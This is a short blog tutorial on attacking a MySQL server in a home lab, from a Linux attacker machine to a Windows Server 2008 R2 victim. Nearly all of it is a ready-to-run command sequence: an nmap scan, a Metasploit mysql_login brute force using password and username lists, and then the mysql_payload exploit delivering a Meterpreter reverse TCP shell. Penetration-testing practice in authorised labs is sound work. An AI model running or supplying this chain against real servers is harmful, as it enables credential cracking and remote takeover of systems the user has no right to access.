Penetration Testing MySQL server

by do son · Published July 11, 2017 · Updated November 4, 2024

Penetration Testing MySQL server

MySQL is an open source Relational Database Management System (RDBMS). MySQL is widely used and a popular alternative to other SQL solutions because it is open source and can be downloaded for free.

On this post, I am going to guide you how to Penetration Testing MySQL server.

Lab

attacker machine: Linux Mint – IP 192.168.1.7
victim machine: Windows Server 2008R2 – IP 192.168.1.10

Demo

<span data-mce-type="bookmark" style="display: inline-block; width: 0px; overflow: hidden; line-height: 0;" class="mce_SELRES_start"></span>

Command

sudo nmap -sV --script=default 192.168.1.10

use auxiliary/scanner/mysql/mysql_login

show options

set BLANK_PASSWORDS true

set PASS_FILE /home/ddos/Desktop/10_million_password_list_top_1000.txt 

set RHOSTS 192.168.1.10

set USER_FILE /home/ddos/Desktop/userlists.txt

set THREADS 10

run

use exploit/windows/mysql/mysql_payload

show options

set RHOST 192.168.1.10

set PAYLOADS windows/meterpreter/reverse_tcp

exploit -j